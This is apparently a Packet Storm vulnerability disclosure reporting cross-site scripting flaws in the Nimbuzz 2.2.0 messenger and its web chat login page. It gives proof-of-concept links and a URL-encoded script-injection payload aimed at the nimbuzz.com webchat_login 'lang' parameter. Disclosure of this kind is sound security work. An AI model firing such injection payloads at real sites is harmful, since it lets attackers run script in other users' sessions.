Nimbuzz version 2.2.0 suffers from a cross site scripting vulnerability.
d50fa9b8ea7ed78358a7c6a503875b02f8fcd881771b9881fb3119947ecb992a*# Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting
# Date: 09.04.2012
# Author: Sony
# Software Link:
http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded
# Software Version: 2.2.0
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html
..................................................................*
* *
*Well, we have xss in the messenger, interesting place for xss)
http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png
**We have xss in the Chat Window-->View in Browser. (persistent code)
Some pics and video PoC:
http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG
http://www.youtube.com/watch?v=t8mC6Oceq0Y
**And where is forget password: *
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed